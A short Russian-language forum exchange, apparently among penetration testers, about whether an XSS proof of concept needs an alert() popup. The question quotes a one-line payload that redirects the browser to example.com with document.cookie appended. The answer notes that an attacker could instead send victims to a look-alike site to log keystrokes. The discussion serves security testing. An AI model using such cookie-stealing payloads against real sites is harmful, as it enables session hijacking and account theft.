Есть ли причина, по которой alert
необходим?Я понимаю, что это обычное явление для демонстрации доказательства концепции, но достаточно ли просто перенаправления?
Например:
document.location="https://example.com?cookie="+document.cookie
Это важно дляПентестеры помнят, что XSS на самом деле не о всплывающих окнах предупреждений, а о выполнении произвольного JavaScript.Что бы настоящий злоумышленник сделал с доступом, который дает ваш XSS?
Представьте себе, что вы создаете сайт, идентичный домену, аналогичному домену вашего клиента, и перенаправляете туда пользователя ... за исключением того, что теперь вам не нужны XSS иможет регистрировать нажатия клавиш, просить их загружать файлы, пытаться использовать эксплойты браузера и т. д.